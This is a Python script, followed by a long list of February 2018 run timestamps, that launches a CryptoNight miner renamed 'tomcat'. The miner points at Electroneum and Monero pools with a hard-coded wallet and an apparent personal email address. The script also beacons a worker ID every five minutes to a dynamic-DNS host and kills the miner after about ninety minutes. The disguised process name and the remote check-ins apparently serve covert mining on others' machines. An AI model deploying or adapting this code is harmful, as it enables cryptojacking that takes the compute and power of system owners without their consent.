import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:03.176479
#2018-02-17 16:23:01.982923
#2018-02-17 18:10:08.839622
#2018-02-17 19:58:06.077670
#2018-02-17 21:46:06.422481
#2018-02-17 23:31:05.001532
#2018-02-18 01:20:07.528037
#2018-02-18 03:07:06.943644
#2018-02-18 04:56:06.809631
#2018-02-18 06:48:07.221907
#2018-02-18 08:39:06.100308
#2018-02-18 10:25:04.842978
#2018-02-18 12:11:05.650299
#2018-02-18 13:57:06.662000
#2018-02-18 15:47:07.001780
#2018-02-18 17:38:01.975187
#2018-02-18 19:26:02.056546
#2018-02-18 21:11:03.531114
#2018-02-18 22:58:06.878604
#2018-02-19 00:46:08.013000
#2018-02-19 02:33:06.749659
#2018-02-19 04:19:06.820149
#2018-02-19 06:04:07.225330
#2018-02-19 07:53:07.085194
#2018-02-19 09:44:01.796720
#2018-02-19 11:34:07.690909
#2018-02-19 13:21:01.670018
#2018-02-19 15:08:04.022169
#2018-02-19 16:57:08.960918
#2018-02-19 18:44:08.760366
#2018-02-19 20:34:06.615697
#2018-02-19 22:22:05.434860
#2018-02-20 00:09:07.577111
#2018-02-20 01:57:06.758084
#2018-02-20 03:47:03.898093
#2018-02-20 05:33:01.522843
#2018-02-20 07:17:06.132657
#2018-02-20 09:03:03.840546
#2018-02-20 10:47:08.404206
#2018-02-20 12:35:07.525343
#2018-02-20 14:20:10.365655
#2018-02-20 16:04:01.332222
#2018-02-20 17:51:10.672904
#2018-02-20 19:42:07.900913
#2018-02-20 21:31:01.807691
#2018-02-20 23:14:05.221903
#2018-02-21 01:04:01.942853
#2018-02-21 02:50:09.211361
#2018-02-21 04:38:07.165908
#2018-02-21 06:26:05.471430
#2018-02-21 08:11:01.275144
#2018-02-21 09:57:06.115225
#2018-02-21 12:43:07.546909
#2018-02-21 14:31:07.102731
#2018-02-21 16:18:06.501071
#2018-02-21 18:08:05.179656
#2018-02-21 19:55:07.563010
#2018-02-21 21:42:05.059805
#2018-02-21 23:29:04.894539
#2018-02-22 01:18:06.515139
#2018-02-22 03:07:05.170539
#2018-02-22 04:53:03.914283
#2018-02-22 06:38:04.967770
#2018-02-22 08:27:06.178685
#2018-02-22 10:14:01.505219
#2018-02-22 11:59:07.847199
#2018-02-22 13:45:12.299407
#2018-02-22 15:35:01.842558
#2018-02-22 17:22:09.918770
#2018-02-22 19:11:06.227573
#2018-02-22 21:03:06.833252
#2018-02-22 22:49:07.605215
#2018-02-23 00:38:08.116973
#2018-02-23 02:25:05.031222
#2018-02-23 04:14:06.945783
#2018-02-23 06:01:07.499514
#2018-02-23 07:32:03.342741
#2018-02-23 09:35:06.077616
#2018-02-23 11:06:07.191685
#2018-02-23 12:32:05.627196
#2018-02-23 14:01:03.974743
#2018-02-23 15:36:08.809859
#2018-02-23 17:09:06.371278
#2018-02-23 18:34:06.075458
#2018-02-23 20:16:03.673442
#2018-02-23 21:48:05.956308
#2018-02-23 23:24:07.501675
#2018-02-24 00:59:01.330504
#2018-02-24 02:44:02.103236
#2018-02-24 04:23:04.400624
#2018-02-24 05:51:05.864772
#2018-02-24 07:28:05.392331
#2018-02-24 09:02:04.276965
#2018-02-24 10:50:06.261927
#2018-02-24 12:37:04.936135
#2018-02-24 14:26:05.948738
#2018-02-24 16:14:01.989870
#2018-02-24 18:08:07.776470
#2018-02-24 19:53:06.471311
#2018-02-24 21:38:06.384856
#2018-02-25 00:27:06.256467
#2018-02-25 03:31:06.341349
#2018-02-25 07:20:04.086499